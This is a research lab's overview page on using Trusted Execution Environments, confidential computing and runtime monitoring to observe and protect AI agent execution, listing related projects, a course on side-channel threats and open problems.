This research direction studies how to use Trusted Execution Environments (TEE) and runtime monitoring to monitor agent execution and build trusted infrastructure for LLM systems and AI agents. The goal is to make agent backends more observable, trustworthy, and resilient, especially when they operate over shared cloud infrastructure and sensitive data.
Related searches this page is designed to serve: AI agent security, secure AI agents, agent runtime monitoring, TEE for AI agents, trusted infrastructure for LLM systems, trustworthy agent execution.
This direction focuses on monitoring and protecting agent execution rather than only verifying final outputs. It brings together TEE, confidential computing, and runtime observation to support trustworthy LLM systems and agentic infrastructure.
WAVE: Leveraging Architecture Observation for Privacy-Preserving Model Oversight explores how system-level observation can support privacy-preserving monitoring of model execution, which is closely aligned with runtime monitoring for trustworthy LLM systems and agents.
SCALE: Tackling Communication Bottlenecks in Confidential Multi-GPU ML contributes infrastructure for secure and efficient confidential multi-GPU execution, which is important for building trusted backends for large-scale LLM systems and agents.
CSCI 699: Side-Channel Threats in Cloud and LLM Systems covers threat models that are increasingly relevant when agents and LLM systems run on shared infrastructure.
TEE and Confidential Computing provide mechanisms for isolated execution, protection of agent state, and secure multi-tenant infrastructure.
Verifiable AI remains closely related because agent systems also need execution integrity, auditability, and trustworthy model-serving pipelines.
Key open problems include how to use TEE or runtime monitoring to observe agent execution, how to isolate tool execution, how to protect long-lived memory and secrets, how to build trusted infrastructure for LLM systems and agents, and how to defend against cloud- and hardware-level leakages in agent backends.
The SEPT Lab studies systems and security problems that naturally connect to the foundations of AI agent security, especially where secure execution and trustworthy infrastructure meet modern AI workloads.